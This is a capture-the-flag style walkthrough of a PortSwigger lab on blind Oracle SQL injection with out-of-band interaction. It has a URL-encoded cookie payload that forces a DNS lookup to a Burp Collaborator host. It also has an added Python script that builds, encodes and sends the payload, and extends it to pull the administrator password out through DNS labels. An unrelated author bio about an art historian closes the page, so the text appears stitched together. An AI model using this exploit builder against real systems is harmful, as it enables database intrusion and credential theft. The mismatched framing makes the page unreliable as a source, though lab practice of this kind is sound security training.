Lab 15 : Lab: Blind SQL injection with out-of-band interaction

Problem Statement :

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

Understanding –

You can trigger an out-of-band network interaction using OAST (out-of-band application security testing) techniques. This is exactly the situation the technique is for: because the query runs asynchronously and has no effect on the response, the in-band techniques from the earlier labs (conditional responses, conditional errors, time delays) give no signal at all, whereas a DNS lookup to a domain you control is observable no matter what the application returns. Often you can also exfiltrate data directly over the out-of-band channel, for example by placing the data into the hostname of a DNS lookup for a domain that you control.

https://portswigger.net/burp/application-security-testing/oast

Payload used for this lab, URL-encoded exactly as it is sent in the cookie (the Collaborator subdomain is specific to the session in which the lab was solved):

'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//cgwihkkm49dt3sgk9lufyyb6mxsngc.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Solution –

  1. Visit the front page of the shop, and use Burp Suite to intercept and modify the request containing the TrackingId cookie.
  2. Modify the TrackingId cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, you can combine SQL injection with basic XXE techniques as follows:
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
    The quote after x closes the string literal the cookie value is placed in; the rest is a UNION SELECT whose xmltype() argument is an XML document declaring an external parameter entity, which the database resolves by looking up the Collaborator hostname. The payload is Oracle-specific (xmltype, EXTRACTVALUE, FROM dual); other database engines need a different out-of-band primitive. Spaces, ?, =, :, ; and % are URL-encoded because the value travels in a Cookie header and is URL-decoded before it reaches the query.
  3. Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain in place of BURP-COLLABORATOR-SUBDOMAIN in the modified TrackingId cookie, then forward the request.

The solution described here is sufficient simply to trigger a DNS lookup and so solve the lab. In a real-world situation, you would use Burp Collaborator client to verify that your payload had indeed triggered a DNS lookup and potentially exploit this behavior to exfiltrate sensitive data from the application. We’ll go over this technique in the next lab.
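As an added worked example (not part of the original post), the following Python builds the step 2 cookie value for any Collaborator domain, shows the decoded SQL the database actually receives, checks that the URL-encoding round-trips, and extends the same builder to the exfiltration form described under Understanding, where a subquery's result becomes a DNS label in front of your domain. The Collaborator subdomain is the one shown above; the lab URL, the users/password subquery and all helper names are assumptions.

```python
# Added example (not from the original post): build and check the out-of-band
# Oracle SQL injection payload for the TrackingId cookie, plus the DNS
# exfiltration variant. Lab URL, subquery and helper names are assumptions.
from urllib.parse import unquote_plus
from urllib.request import Request, urlopen

# Subdomain shown in the walkthrough; replace with one from your own Collaborator session.
COLLABORATOR = "cgwihkkm49dt3sgk9lufyyb6mxsngc.burpcollaborator.net"


def oracle_oob_sql(host: str) -> str:
    """Decoded injection: Oracle parses the XML given to xmltype(), and the external
    parameter entity %remote makes the database resolve `host` via DNS (and try an
    HTTP fetch). The query's result is irrelevant; only the lookup matters."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://' + host + '/"> %remote;]>'
    )
    return "x' UNION SELECT EXTRACTVALUE(xmltype('" + xml + "'),'/l') FROM dual--"


def oracle_oob_exfil_host(subquery: str, collab_domain: str) -> str:
    """Host expression for exfiltration: the subquery's result becomes a DNS label in
    front of the Collaborator domain. The '||...||' breaks out of the string literal
    that xmltype() receives, so Oracle concatenates the value at run time.
    DNS labels are limited to 63 bytes of hostname-safe characters; longer or odd
    values need SUBSTR()/encoding, which this example does not add."""
    return "'||(" + subquery + ")||'." + collab_domain


# Characters that would break the Cookie header or be altered by the server's
# URL-decoding of the cookie value; the mapping reproduces the encoding Burp used.
_COOKIE_ENCODING = {" ": "+", "?": "%3f", "=": "%3d", "%": "%25", ":": "%3a", ";": "%3b"}


def cookie_encode(sql: str) -> str:
    """Single pass over the characters, so '%' is never encoded twice."""
    return "".join(_COOKIE_ENCODING.get(ch, ch) for ch in sql)


def tracking_id_cookie(host: str) -> str:
    """The complete TrackingId cookie value sent to the lab."""
    return cookie_encode(oracle_oob_sql(host))


def roundtrips(cookie_value: str, sql: str) -> bool:
    """True if URL-decoding the cookie yields exactly the intended SQL and the encoded
    value contains nothing that would be parsed as a cookie delimiter."""
    return unquote_plus(cookie_value) == sql and not any(c in cookie_value for c in " ;")


def send_tracking_cookie(lab_url: str, cookie_value: str, timeout: float = 10.0) -> int:
    """Send the payload once (hypothetical lab URL). The HTTP response carries no
    signal; the DNS interaction in the Collaborator client is the evidence."""
    req = Request(lab_url, headers={"Cookie": "TrackingId=" + cookie_value})
    with urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    plain = oracle_oob_sql(COLLABORATOR)
    cookie = tracking_id_cookie(COLLABORATOR)
    print("decoded SQL :", plain)
    print("cookie value:", cookie)
    print("round-trips :", roundtrips(cookie, plain))
    # Exfiltration form (the next lab's technique); table and column names are assumptions.
    exfil_host = oracle_oob_exfil_host(
        "SELECT password FROM users WHERE username='administrator'", COLLABORATOR)
    print("exfil cookie:", cookie_encode(oracle_oob_sql(exfil_host)))
    # send_tracking_cookie("https://YOUR-LAB-ID.web-security-academy.net/", cookie)
```

Running the script prints both the decoded and the cookie-encoded forms; compare the encoded output against the payload in step 2 to see why each character was encoded. The request-sending call is left commented out because the response tells you nothing, so the only check that matters is the DNS interaction appearing in the Collaborator client.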


About the author

Sophia Bennett is an art historian and freelance writer with a passion for exploring the intersections between nature, symbolism, and artistic expression. With a background in Renaissance and modern art, Sophia enjoys uncovering the hidden meanings behind iconic works and sharing her insights with art lovers of all levels. When she’s not visiting museums or researching the latest trends in contemporary art, you can find her hiking in the countryside, always chasing the next rainbow.